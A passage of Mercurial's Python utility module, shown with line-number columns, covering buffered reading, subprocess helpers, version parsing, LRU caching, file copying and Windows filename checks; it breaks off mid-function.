375 377 if lfi < 0: # end of file
376 378 size = self._lenbuf
377 379 elif 1 < len(self._buffer):
378 380 # we need to take previous chunks into account
379 381 size += self._lenbuf - len(self._buffer[-1])
380 382 return self._frombuffer(size)
381 383
382 384 def _frombuffer(self, size):
383 385 """return at most 'size' data from the buffer
384 386
385 387 The data are removed from the buffer."""
386 388 if size == 0 or not self._buffer:
387 389 return ''
388 390 buf = self._buffer[0]
389 391 if 1 < len(self._buffer):
390 392 buf = ''.join(self._buffer)
391 393
392 394 data = buf[:size]
393 395 buf = buf[len(data):]
394 396 if buf:
395 397 self._buffer = [buf]
396 398 self._lenbuf = len(buf)
397 399 else:
398 400 self._buffer = []
399 401 self._lenbuf = 0
400 402 return data
401 403
402 404 def _fillbuffer(self):
403 405 """read data to the buffer"""
404 406 data = os.read(self._input.fileno(), _chunksize)
405 407 if not data:
406 408 self._eof = True
407 409 else:
408 410 self._lenbuf += len(data)
409 411 self._buffer.append(data)
410 412
411 413 def mmapread(fp):
412 414 try:
413 415 fd = getattr(fp, 'fileno', lambda: fp)()
414 416 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
415 417 except ValueError:
416 418 # Empty files cannot be mmapped, but mmapread should still work. Check
417 419 # if the file is empty, and if so, return an empty buffer.
418 420 if os.fstat(fd).st_size == 0:
419 421 return ''
420 422 raise
421 423
422 424 def popen2(cmd, env=None, newlines=False):
423 425 # Setting bufsize to -1 lets the system decide the buffer size.
424 426 # The default for bufsize is 0, meaning unbuffered. This leads to
425 427 # poor performance on Mac OS X: http://bugs.python.org/issue4194
426 428 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
427 429 close_fds=closefds,
428 430 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
429 431 universal_newlines=newlines,
430 432 env=env)
431 433 return p.stdin, p.stdout
432 434
433 435 def popen3(cmd, env=None, newlines=False):
434 436 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
435 437 return stdin, stdout, stderr
436 438
437 439 def popen4(cmd, env=None, newlines=False, bufsize=-1):
438 440 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
439 441 close_fds=closefds,
440 442 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
441 443 stderr=subprocess.PIPE,
442 444 universal_newlines=newlines,
443 445 env=env)
444 446 return p.stdin, p.stdout, p.stderr, p
445 447
446 448 def version():
447 449 """Return version information if available."""
448 450 try:
449 451 from . import __version__
450 452 return __version__.version
451 453 except ImportError:
452 454 return 'unknown'
453 455
454 456 def versiontuple(v=None, n=4):
455 457 """Parses a Mercurial version string into an N-tuple.
456 458
457 459 The version string to be parsed is specified with the ``v`` argument.
458 460 If it isn't defined, the current Mercurial version string will be parsed.
459 461
460 462 ``n`` can be 2, 3, or 4. Here is how some version strings map to
461 463 returned values:
462 464
463 465 >>> v = b'3.6.1+190-df9b73d2d444'
464 466 >>> versiontuple(v, 2)
465 467 (3, 6)
466 468 >>> versiontuple(v, 3)
467 469 (3, 6, 1)
468 470 >>> versiontuple(v, 4)
469 471 (3, 6, 1, '190-df9b73d2d444')
470 472
471 473 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
472 474 (3, 6, 1, '190-df9b73d2d444+20151118')
473 475
474 476 >>> v = b'3.6'
475 477 >>> versiontuple(v, 2)
476 478 (3, 6)
477 479 >>> versiontuple(v, 3)
478 480 (3, 6, None)
479 481 >>> versiontuple(v, 4)
480 482 (3, 6, None, None)
481 483
482 484 >>> v = b'3.9-rc'
483 485 >>> versiontuple(v, 2)
484 486 (3, 9)
485 487 >>> versiontuple(v, 3)
486 488 (3, 9, None)
487 489 >>> versiontuple(v, 4)
488 490 (3, 9, None, 'rc')
489 491
490 492 >>> v = b'3.9-rc+2-02a8fea4289b'
491 493 >>> versiontuple(v, 2)
492 494 (3, 9)
493 495 >>> versiontuple(v, 3)
494 496 (3, 9, None)
495 497 >>> versiontuple(v, 4)
496 498 (3, 9, None, 'rc+2-02a8fea4289b')
497 499 """
498 500 if not v:
499 501 v = version()
500 502 parts = remod.split('[\+-]', v, 1)
501 503 if len(parts) == 1:
502 504 vparts, extra = parts[0], None
503 505 else:
504 506 vparts, extra = parts
505 507
506 508 vints = []
507 509 for i in vparts.split('.'):
508 510 try:
509 511 vints.append(int(i))
510 512 except ValueError:
511 513 break
512 514 # (3, 6) -> (3, 6, None)
513 515 while len(vints) < 3:
514 516 vints.append(None)
515 517
516 518 if n == 2:
517 519 return (vints[0], vints[1])
518 520 if n == 3:
519 521 return (vints[0], vints[1], vints[2])
520 522 if n == 4:
521 523 return (vints[0], vints[1], vints[2], extra)
522 524
523 525 # used by parsedate
524 526 defaultdateformats = (
525 527 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
526 528 '%Y-%m-%dT%H:%M', # without seconds
527 529 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
528 530 '%Y-%m-%dT%H%M', # without seconds
529 531 '%Y-%m-%d %H:%M:%S', # our common legal variant
530 532 '%Y-%m-%d %H:%M', # without seconds
531 533 '%Y-%m-%d %H%M%S', # without :
532 534 '%Y-%m-%d %H%M', # without seconds
533 535 '%Y-%m-%d %I:%M:%S%p',
534 536 '%Y-%m-%d %H:%M',
535 537 '%Y-%m-%d %I:%M%p',
536 538 '%Y-%m-%d',
537 539 '%m-%d',
538 540 '%m/%d',
539 541 '%m/%d/%y',
540 542 '%m/%d/%Y',
541 543 '%a %b %d %H:%M:%S %Y',
542 544 '%a %b %d %I:%M:%S%p %Y',
543 545 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
544 546 '%b %d %H:%M:%S %Y',
545 547 '%b %d %I:%M:%S%p %Y',
546 548 '%b %d %H:%M:%S',
547 549 '%b %d %I:%M:%S%p',
548 550 '%b %d %H:%M',
549 551 '%b %d %I:%M%p',
550 552 '%b %d %Y',
551 553 '%b %d',
552 554 '%H:%M:%S',
553 555 '%I:%M:%S%p',
554 556 '%H:%M',
555 557 '%I:%M%p',
556 558 )
557 559
558 560 extendeddateformats = defaultdateformats + (
559 561 "%Y",
560 562 "%Y-%m",
561 563 "%b",
562 564 "%b %Y",
563 565 )
564 566
565 567 def cachefunc(func):
566 568 '''cache the result of function calls'''
567 569 # XXX doesn't handle keywords args
568 570 if func.__code__.co_argcount == 0:
569 571 cache = []
570 572 def f():
571 573 if len(cache) == 0:
572 574 cache.append(func())
573 575 return cache[0]
574 576 return f
575 577 cache = {}
576 578 if func.__code__.co_argcount == 1:
577 579 # we gain a small amount of time because
578 580 # we don't need to pack/unpack the list
579 581 def f(arg):
580 582 if arg not in cache:
581 583 cache[arg] = func(arg)
582 584 return cache[arg]
583 585 else:
584 586 def f(*args):
585 587 if args not in cache:
586 588 cache[args] = func(*args)
587 589 return cache[args]
588 590
589 591 return f
590 592
591 593 class cow(object):
592 594 """helper class to make copy-on-write easier
593 595
594 596 Call preparewrite before doing any writes.
595 597 """
596 598
597 599 def preparewrite(self):
598 600 """call this before writes, return self or a copied new object"""
599 601 if getattr(self, '_copied', 0):
600 602 self._copied -= 1
601 603 return self.__class__(self)
602 604 return self
603 605
604 606 def copy(self):
605 607 """always do a cheap copy"""
606 608 self._copied = getattr(self, '_copied', 0) + 1
607 609 return self
608 610
609 611 class sortdict(collections.OrderedDict):
610 612 '''a simple sorted dictionary
611 613
612 614 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
613 615 >>> d2 = d1.copy()
614 616 >>> d2
615 617 sortdict([('a', 0), ('b', 1)])
616 618 >>> d2.update([(b'a', 2)])
617 619 >>> list(d2.keys()) # should still be in last-set order
618 620 ['b', 'a']
619 621 '''
620 622
621 623 def __setitem__(self, key, value):
622 624 if key in self:
623 625 del self[key]
624 626 super(sortdict, self).__setitem__(key, value)
625 627
626 628 if pycompat.ispypy:
627 629 # __setitem__() isn't called as of PyPy 5.8.0
628 630 def update(self, src):
629 631 if isinstance(src, dict):
630 632 src = src.iteritems()
631 633 for k, v in src:
632 634 self[k] = v
633 635
634 636 class cowdict(cow, dict):
635 637 """copy-on-write dict
636 638
637 639 Be sure to call d = d.preparewrite() before writing to d.
638 640
639 641 >>> a = cowdict()
640 642 >>> a is a.preparewrite()
641 643 True
642 644 >>> b = a.copy()
643 645 >>> b is a
644 646 True
645 647 >>> c = b.copy()
646 648 >>> c is a
647 649 True
648 650 >>> a = a.preparewrite()
649 651 >>> b is a
650 652 False
651 653 >>> a is a.preparewrite()
652 654 True
653 655 >>> c = c.preparewrite()
654 656 >>> b is c
655 657 False
656 658 >>> b is b.preparewrite()
657 659 True
658 660 """
659 661
660 662 class cowsortdict(cow, sortdict):
661 663 """copy-on-write sortdict
662 664
663 665 Be sure to call d = d.preparewrite() before writing to d.
664 666 """
665 667
666 668 class transactional(object):
667 669 """Base class for making a transactional type into a context manager."""
668 670 __metaclass__ = abc.ABCMeta
669 671
670 672 @abc.abstractmethod
671 673 def close(self):
672 674 """Successfully closes the transaction."""
673 675
674 676 @abc.abstractmethod
675 677 def release(self):
676 678 """Marks the end of the transaction.
677 679
678 680 If the transaction has not been closed, it will be aborted.
679 681 """
680 682
681 683 def __enter__(self):
682 684 return self
683 685
684 686 def __exit__(self, exc_type, exc_val, exc_tb):
685 687 try:
686 688 if exc_type is None:
687 689 self.close()
688 690 finally:
689 691 self.release()
690 692
691 693 @contextlib.contextmanager
692 694 def acceptintervention(tr=None):
693 695 """A context manager that closes the transaction on InterventionRequired
694 696
695 697 If no transaction was provided, this simply runs the body and returns
696 698 """
697 699 if not tr:
698 700 yield
699 701 return
700 702 try:
701 703 yield
702 704 tr.close()
703 705 except error.InterventionRequired:
704 706 tr.close()
705 707 raise
706 708 finally:
707 709 tr.release()
708 710
709 711 @contextlib.contextmanager
710 712 def nullcontextmanager():
711 713 yield
712 714
713 715 class _lrucachenode(object):
714 716 """A node in a doubly linked list.
715 717
716 718 Holds a reference to nodes on either side as well as a key-value
717 719 pair for the dictionary entry.
718 720 """
719 721 __slots__ = (u'next', u'prev', u'key', u'value')
720 722
721 723 def __init__(self):
722 724 self.next = None
723 725 self.prev = None
724 726
725 727 self.key = _notset
726 728 self.value = None
727 729
728 730 def markempty(self):
729 731 """Mark the node as emptied."""
730 732 self.key = _notset
731 733
732 734 class lrucachedict(object):
733 735 """Dict that caches most recent accesses and sets.
734 736
735 737 The dict consists of an actual backing dict - indexed by original
736 738 key - and a doubly linked circular list defining the order of entries in
737 739 the cache.
738 740
739 741 The head node is the newest entry in the cache. If the cache is full,
740 742 we recycle head.prev and make it the new head. Cache accesses result in
741 743 the node being moved to before the existing head and being marked as the
742 744 new head node.
743 745 """
744 746 def __init__(self, max):
745 747 self._cache = {}
746 748
747 749 self._head = head = _lrucachenode()
748 750 head.prev = head
749 751 head.next = head
750 752 self._size = 1
751 753 self._capacity = max
752 754
753 755 def __len__(self):
754 756 return len(self._cache)
755 757
756 758 def __contains__(self, k):
757 759 return k in self._cache
758 760
759 761 def __iter__(self):
760 762 # We don't have to iterate in cache order, but why not.
761 763 n = self._head
762 764 for i in range(len(self._cache)):
763 765 yield n.key
764 766 n = n.next
765 767
766 768 def __getitem__(self, k):
767 769 node = self._cache[k]
768 770 self._movetohead(node)
769 771 return node.value
770 772
771 773 def __setitem__(self, k, v):
772 774 node = self._cache.get(k)
773 775 # Replace existing value and mark as newest.
774 776 if node is not None:
775 777 node.value = v
776 778 self._movetohead(node)
777 779 return
778 780
779 781 if self._size < self._capacity:
780 782 node = self._addcapacity()
781 783 else:
782 784 # Grab the last/oldest item.
783 785 node = self._head.prev
784 786
785 787 # At capacity. Kill the old entry.
786 788 if node.key is not _notset:
787 789 del self._cache[node.key]
788 790
789 791 node.key = k
790 792 node.value = v
791 793 self._cache[k] = node
792 794 # And mark it as newest entry. No need to adjust order since it
793 795 # is already self._head.prev.
794 796 self._head = node
795 797
796 798 def __delitem__(self, k):
797 799 node = self._cache.pop(k)
798 800 node.markempty()
799 801
800 802 # Temporarily mark as newest item before re-adjusting head to make
801 803 # this node the oldest item.
802 804 self._movetohead(node)
803 805 self._head = node.next
804 806
805 807 # Additional dict methods.
806 808
807 809 def get(self, k, default=None):
808 810 try:
809 811 return self._cache[k].value
810 812 except KeyError:
811 813 return default
812 814
813 815 def clear(self):
814 816 n = self._head
815 817 while n.key is not _notset:
816 818 n.markempty()
817 819 n = n.next
818 820
819 821 self._cache.clear()
820 822
821 823 def copy(self):
822 824 result = lrucachedict(self._capacity)
823 825 n = self._head.prev
824 826 # Iterate in oldest-to-newest order, so the copy has the right ordering
825 827 for i in range(len(self._cache)):
826 828 result[n.key] = n.value
827 829 n = n.prev
828 830 return result
829 831
830 832 def _movetohead(self, node):
831 833 """Mark a node as the newest, making it the new head.
832 834
833 835 When a node is accessed, it becomes the freshest entry in the LRU
834 836 list, which is denoted by self._head.
835 837
836 838 Visually, let's make ``N`` the new head node (* denotes head):
837 839
838 840 previous/oldest <-> head <-> next/next newest
839 841
840 842 ----<->--- A* ---<->-----
841 843 | |
842 844 E <-> D <-> N <-> C <-> B
843 845
844 846 To:
845 847
846 848 ----<->--- N* ---<->-----
847 849 | |
848 850 E <-> D <-> C <-> B <-> A
849 851
850 852 This requires the following moves:
851 853
852 854 C.next = D (node.prev.next = node.next)
853 855 D.prev = C (node.next.prev = node.prev)
854 856 E.next = N (head.prev.next = node)
855 857 N.prev = E (node.prev = head.prev)
856 858 N.next = A (node.next = head)
857 859 A.prev = N (head.prev = node)
858 860 """
859 861 head = self._head
860 862 # C.next = D
861 863 node.prev.next = node.next
862 864 # D.prev = C
863 865 node.next.prev = node.prev
864 866 # N.prev = E
865 867 node.prev = head.prev
866 868 # N.next = A
867 869 # It is tempting to do just "head" here, however if node is
868 870 # adjacent to head, this will do bad things.
869 871 node.next = head.prev.next
870 872 # E.next = N
871 873 node.next.prev = node
872 874 # A.prev = N
873 875 node.prev.next = node
874 876
875 877 self._head = node
876 878
877 879 def _addcapacity(self):
878 880 """Add a node to the circular linked list.
879 881
880 882 The new node is inserted before the head node.
881 883 """
882 884 head = self._head
883 885 node = _lrucachenode()
884 886 head.prev.next = node
885 887 node.prev = head.prev
886 888 node.next = head
887 889 head.prev = node
888 890 self._size += 1
889 891 return node
890 892
891 893 def lrucachefunc(func):
892 894 '''cache most recent results of function calls'''
893 895 cache = {}
894 896 order = collections.deque()
895 897 if func.__code__.co_argcount == 1:
896 898 def f(arg):
897 899 if arg not in cache:
898 900 if len(cache) > 20:
899 901 del cache[order.popleft()]
900 902 cache[arg] = func(arg)
901 903 else:
902 904 order.remove(arg)
903 905 order.append(arg)
904 906 return cache[arg]
905 907 else:
906 908 def f(*args):
907 909 if args not in cache:
908 910 if len(cache) > 20:
909 911 del cache[order.popleft()]
910 912 cache[args] = func(*args)
911 913 else:
912 914 order.remove(args)
913 915 order.append(args)
914 916 return cache[args]
915 917
916 918 return f
917 919
918 920 class propertycache(object):
919 921 def __init__(self, func):
920 922 self.func = func
921 923 self.name = func.__name__
922 924 def __get__(self, obj, type=None):
923 925 result = self.func(obj)
924 926 self.cachevalue(obj, result)
925 927 return result
926 928
927 929 def cachevalue(self, obj, value):
928 930 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
929 931 obj.__dict__[self.name] = value
930 932
931 933 def pipefilter(s, cmd):
932 934 '''filter string S through command CMD, returning its output'''
933 935 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
934 936 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
935 937 pout, perr = p.communicate(s)
936 938 return pout
937 939
938 940 def tempfilter(s, cmd):
939 941 '''filter string S through a pair of temporary files with CMD.
940 942 CMD is used as a template to create the real command to be run,
941 943 with the strings INFILE and OUTFILE replaced by the real names of
942 944 the temporary files generated.'''
943 945 inname, outname = None, None
944 946 try:
945 947 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
946 948 fp = os.fdopen(infd, pycompat.sysstr('wb'))
947 949 fp.write(s)
948 950 fp.close()
949 951 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
950 952 os.close(outfd)
951 953 cmd = cmd.replace('INFILE', inname)
952 954 cmd = cmd.replace('OUTFILE', outname)
953 955 code = os.system(cmd)
954 956 if pycompat.sysplatform == 'OpenVMS' and code & 1:
955 957 code = 0
956 958 if code:
957 959 raise Abort(_("command '%s' failed: %s") %
958 960 (cmd, explainexit(code)))
959 961 return readfile(outname)
960 962 finally:
961 963 try:
962 964 if inname:
963 965 os.unlink(inname)
964 966 except OSError:
965 967 pass
966 968 try:
967 969 if outname:
968 970 os.unlink(outname)
969 971 except OSError:
970 972 pass
971 973
972 974 filtertable = {
973 975 'tempfile:': tempfilter,
974 976 'pipe:': pipefilter,
975 977 }
976 978
977 979 def filter(s, cmd):
978 980 "filter a string through a command that transforms its input to its output"
979 981 for name, fn in filtertable.iteritems():
980 982 if cmd.startswith(name):
981 983 return fn(s, cmd[len(name):].lstrip())
982 984 return pipefilter(s, cmd)
983 985
984 986 def binary(s):
985 987 """return true if a string is binary data"""
986 988 return bool(s and '\0' in s)
987 989
988 990 def increasingchunks(source, min=1024, max=65536):
989 991 '''return no less than min bytes per chunk while data remains,
990 992 doubling min after each chunk until it reaches max'''
991 993 def log2(x):
992 994 if not x:
993 995 return 0
994 996 i = 0
995 997 while x:
996 998 x >>= 1
997 999 i += 1
998 1000 return i - 1
999 1001
1000 1002 buf = []
1001 1003 blen = 0
1002 1004 for chunk in source:
1003 1005 buf.append(chunk)
1004 1006 blen += len(chunk)
1005 1007 if blen >= min:
1006 1008 if min < max:
1007 1009 min = min << 1
1008 1010 nmin = 1 << log2(blen)
1009 1011 if nmin > min:
1010 1012 min = nmin
1011 1013 if min > max:
1012 1014 min = max
1013 1015 yield ''.join(buf)
1014 1016 blen = 0
1015 1017 buf = []
1016 1018 if buf:
1017 1019 yield ''.join(buf)
1018 1020
1019 1021 Abort = error.Abort
1020 1022
1021 1023 def always(fn):
1022 1024 return True
1023 1025
1024 1026 def never(fn):
1025 1027 return False
1026 1028
1027 1029 def nogc(func):
1028 1030 """disable garbage collector
1029 1031
1030 1032 Python's garbage collector triggers a GC each time a certain number of
1031 1033 container objects (the number being defined by gc.get_threshold()) are
1032 1034 allocated even when marked not to be tracked by the collector. Tracking has
1033 1035 no effect on when GCs are triggered, only on what objects the GC looks
1034 1036 into. As a workaround, disable GC while building complex (huge)
1035 1037 containers.
1036 1038
1037 1039 This garbage collector issue have been fixed in 2.7. But it still affect
1038 1040 CPython's performance.
1039 1041 """
1040 1042 def wrapper(*args, **kwargs):
1041 1043 gcenabled = gc.isenabled()
1042 1044 gc.disable()
1043 1045 try:
1044 1046 return func(*args, **kwargs)
1045 1047 finally:
1046 1048 if gcenabled:
1047 1049 gc.enable()
1048 1050 return wrapper
1049 1051
1050 1052 if pycompat.ispypy:
1051 1053 # PyPy runs slower with gc disabled
1052 1054 nogc = lambda x: x
1053 1055
1054 1056 def pathto(root, n1, n2):
1055 1057 '''return the relative path from one place to another.
1056 1058 root should use os.sep to separate directories
1057 1059 n1 should use os.sep to separate directories
1058 1060 n2 should use "/" to separate directories
1059 1061 returns an os.sep-separated path.
1060 1062
1061 1063 If n1 is a relative path, it's assumed it's
1062 1064 relative to root.
1063 1065 n2 should always be relative to root.
1064 1066 '''
1065 1067 if not n1:
1066 1068 return localpath(n2)
1067 1069 if os.path.isabs(n1):
1068 1070 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1069 1071 return os.path.join(root, localpath(n2))
1070 1072 n2 = '/'.join((pconvert(root), n2))
1071 1073 a, b = splitpath(n1), n2.split('/')
1072 1074 a.reverse()
1073 1075 b.reverse()
1074 1076 while a and b and a[-1] == b[-1]:
1075 1077 a.pop()
1076 1078 b.pop()
1077 1079 b.reverse()
1078 1080 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1079 1081
1080 1082 def mainfrozen():
1081 1083 """return True if we are a frozen executable.
1082 1084
1083 1085 The code supports py2exe (most common, Windows only) and tools/freeze
1084 1086 (portable, not much used).
1085 1087 """
1086 1088 return (safehasattr(sys, "frozen") or # new py2exe
1087 1089 safehasattr(sys, "importers") or # old py2exe
1088 1090 imp.is_frozen(u"__main__")) # tools/freeze
1089 1091
1090 1092 # the location of data files matching the source code
1091 1093 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1092 1094 # executable version (py2exe) doesn't support __file__
1093 1095 datapath = os.path.dirname(pycompat.sysexecutable)
1094 1096 else:
1095 1097 datapath = os.path.dirname(pycompat.fsencode(__file__))
1096 1098
1097 1099 i18n.setdatapath(datapath)
1098 1100
1099 1101 _hgexecutable = None
1100 1102
1101 1103 def hgexecutable():
1102 1104 """return location of the 'hg' executable.
1103 1105
1104 1106 Defaults to $HG or 'hg' in the search path.
1105 1107 """
1106 1108 if _hgexecutable is None:
1107 1109 hg = encoding.environ.get('HG')
1108 1110 mainmod = sys.modules[pycompat.sysstr('__main__')]
1109 1111 if hg:
1110 1112 _sethgexecutable(hg)
1111 1113 elif mainfrozen():
1112 1114 if getattr(sys, 'frozen', None) == 'macosx_app':
1113 1115 # Env variable set by py2app
1114 1116 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1115 1117 else:
1116 1118 _sethgexecutable(pycompat.sysexecutable)
1117 1119 elif (os.path.basename(
1118 1120 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1119 1121 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1120 1122 else:
1121 1123 exe = findexe('hg') or os.path.basename(sys.argv[0])
1122 1124 _sethgexecutable(exe)
1123 1125 return _hgexecutable
1124 1126
1125 1127 def _sethgexecutable(path):
1126 1128 """set location of the 'hg' executable"""
1127 1129 global _hgexecutable
1128 1130 _hgexecutable = path
1129 1131
1130 1132 def _isstdout(f):
1131 1133 fileno = getattr(f, 'fileno', None)
1132 1134 return fileno and fileno() == sys.__stdout__.fileno()
1133 1135
1134 1136 def shellenviron(environ=None):
1135 1137 """return environ with optional override, useful for shelling out"""
1136 1138 def py2shell(val):
1137 1139 'convert python object into string that is useful to shell'
1138 1140 if val is None or val is False:
1139 1141 return '0'
1140 1142 if val is True:
1141 1143 return '1'
1142 1144 return str(val)
1143 1145 env = dict(encoding.environ)
1144 1146 if environ:
1145 1147 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1146 1148 env['HG'] = hgexecutable()
1147 1149 return env
1148 1150
1149 1151 def system(cmd, environ=None, cwd=None, out=None):
1150 1152 '''enhanced shell command execution.
1151 1153 run with environment maybe modified, maybe in different dir.
1152 1154
1153 1155 if out is specified, it is assumed to be a file-like object that has a
1154 1156 write() method. stdout and stderr will be redirected to out.'''
1155 1157 try:
1156 1158 stdout.flush()
1157 1159 except Exception:
1158 1160 pass
1159 1161 cmd = quotecommand(cmd)
1160 1162 env = shellenviron(environ)
1161 1163 if out is None or _isstdout(out):
1162 1164 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1163 1165 env=env, cwd=cwd)
1164 1166 else:
1165 1167 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1166 1168 env=env, cwd=cwd, stdout=subprocess.PIPE,
1167 1169 stderr=subprocess.STDOUT)
1168 1170 for line in iter(proc.stdout.readline, ''):
1169 1171 out.write(line)
1170 1172 proc.wait()
1171 1173 rc = proc.returncode
1172 1174 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1173 1175 rc = 0
1174 1176 return rc
1175 1177
1176 1178 def checksignature(func):
1177 1179 '''wrap a function with code to check for calling errors'''
1178 1180 def check(*args, **kwargs):
1179 1181 try:
1180 1182 return func(*args, **kwargs)
1181 1183 except TypeError:
1182 1184 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1183 1185 raise error.SignatureError
1184 1186 raise
1185 1187
1186 1188 return check
1187 1189
1188 1190 # a whilelist of known filesystems where hardlink works reliably
1189 1191 _hardlinkfswhitelist = {
1190 1192 'btrfs',
1191 1193 'ext2',
1192 1194 'ext3',
1193 1195 'ext4',
1194 1196 'hfs',
1195 1197 'jfs',
1196 1198 'reiserfs',
1197 1199 'tmpfs',
1198 1200 'ufs',
1199 1201 'xfs',
1200 1202 'zfs',
1201 1203 }
1202 1204
1203 1205 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1204 1206 '''copy a file, preserving mode and optionally other stat info like
1205 1207 atime/mtime
1206 1208
1207 1209 checkambig argument is used with filestat, and is useful only if
1208 1210 destination file is guarded by any lock (e.g. repo.lock or
1209 1211 repo.wlock).
1210 1212
1211 1213 copystat and checkambig should be exclusive.
1212 1214 '''
1213 1215 assert not (copystat and checkambig)
1214 1216 oldstat = None
1215 1217 if os.path.lexists(dest):
1216 1218 if checkambig:
1217 1219 oldstat = checkambig and filestat.frompath(dest)
1218 1220 unlink(dest)
1219 1221 if hardlink:
1220 1222 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1221 1223 # unless we are confident that dest is on a whitelisted filesystem.
1222 1224 try:
1223 1225 fstype = getfstype(os.path.dirname(dest))
1224 1226 except OSError:
1225 1227 fstype = None
1226 1228 if fstype not in _hardlinkfswhitelist:
1227 1229 hardlink = False
1228 1230 if hardlink:
1229 1231 try:
1230 1232 oslink(src, dest)
1231 1233 return
1232 1234 except (IOError, OSError):
1233 1235 pass # fall back to normal copy
1234 1236 if os.path.islink(src):
1235 1237 os.symlink(os.readlink(src), dest)
1236 1238 # copytime is ignored for symlinks, but in general copytime isn't needed
1237 1239 # for them anyway
1238 1240 else:
1239 1241 try:
1240 1242 shutil.copyfile(src, dest)
1241 1243 if copystat:
1242 1244 # copystat also copies mode
1243 1245 shutil.copystat(src, dest)
1244 1246 else:
1245 1247 shutil.copymode(src, dest)
1246 1248 if oldstat and oldstat.stat:
1247 1249 newstat = filestat.frompath(dest)
1248 1250 if newstat.isambig(oldstat):
1249 1251 # stat of copied file is ambiguous to original one
1250 1252 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1251 1253 os.utime(dest, (advanced, advanced))
1252 1254 except shutil.Error as inst:
1253 1255 raise Abort(str(inst))
1254 1256
1255 1257 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1256 1258 """Copy a directory tree using hardlinks if possible."""
1257 1259 num = 0
1258 1260
1259 1261 gettopic = lambda: hardlink and _('linking') or _('copying')
1260 1262
1261 1263 if os.path.isdir(src):
1262 1264 if hardlink is None:
1263 1265 hardlink = (os.stat(src).st_dev ==
1264 1266 os.stat(os.path.dirname(dst)).st_dev)
1265 1267 topic = gettopic()
1266 1268 os.mkdir(dst)
1267 1269 for name, kind in listdir(src):
1268 1270 srcname = os.path.join(src, name)
1269 1271 dstname = os.path.join(dst, name)
1270 1272 def nprog(t, pos):
1271 1273 if pos is not None:
1272 1274 return progress(t, pos + num)
1273 1275 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1274 1276 num += n
1275 1277 else:
1276 1278 if hardlink is None:
1277 1279 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1278 1280 os.stat(os.path.dirname(dst)).st_dev)
1279 1281 topic = gettopic()
1280 1282
1281 1283 if hardlink:
1282 1284 try:
1283 1285 oslink(src, dst)
1284 1286 except (IOError, OSError):
1285 1287 hardlink = False
1286 1288 shutil.copy(src, dst)
1287 1289 else:
1288 1290 shutil.copy(src, dst)
1289 1291 num += 1
1290 1292 progress(topic, num)
1291 1293 progress(topic, None)
1292 1294
1293 1295 return hardlink, num
1294 1296
1295 1297 _winreservednames = {
1296 1298 'con', 'prn', 'aux', 'nul',
1297 1299 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1298 1300 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1299 1301 }
1300 1302 _winreservedchars = ':*?"<>|'
1301 1303 def checkwinfilename(path):
1302 1304 r'''Check that the base-relative path is a valid filename on Windows.
1303 1305 Returns None if the path is ok, or a UI string describing the problem.
1304 1306
1305 1307 >>> checkwinfilename(b"just/a/normal/path")
1306 1308 >>> checkwinfilename(b"foo/bar/con.xml")
1307 1309 "filename contains 'con', which is reserved on Windows"
1308 1310 >>> checkwinfilename(b"foo/con.xml/bar")
1309 1311 "filename contains 'con', which is reserved on Windows"
1310 1312 >>> checkwinfilename(b"foo/bar/xml.con")
1311 1313 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1312 1314 "filename contains 'AUX', which is reserved on Windows"
1313 1315 >>> checkwinfilename(b"foo/bar/bla:.txt")
1314 1316 "filename contains ':', which is reserved on Windows"
1315 1317 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1316 1318 "filename contains '\\x07', which is invalid on Windows"
1317 1319 >>> checkwinfilename(b"foo/bar/bla ")
1318 1320 "filename ends with ' ', which is not allowed on Windows"
1319 1321 >>> checkwinfilename(b"../bar")
1320 1322 >>> checkwinfilename(b"foo\\")
1321 1323 "filename ends with '\\', which is invalid on Windows"
1322 1324 >>> checkwinfilename(b"foo\\/bar")
1323 1325 "directory name ends with '\\', which is invalid on Windows"
1324 1326 '''
1325 1327 if path.endswith('\\'):
1326 1328 return _("filename ends with '\\', which is invalid on Windows")
1327 1329 if '\\/' in path:
1328 1330 return _("directory name ends with '\\', which is invalid on Windows")
1329 1331 for n in path.replace('\\', '/').split('/'):
1330 1332 if not n:
1331 1333 continue
1332 1334 for c in _filenamebytestr(n):
1333 1335 if c in _winreservedchars:
1334 1336 return _("filename contains '%s', which is reserved "
1335 1337 "on Windows") % c
1336 1338 if ord(c) <= 31:
1337 1339 return _("filename contains '%s', which is invalid "
1338 1340 "on Windows") % escapestr(c)
1339 1341 base = n.split('.')[0]
1340 1342 if base and base.lower() in _winreservednames:
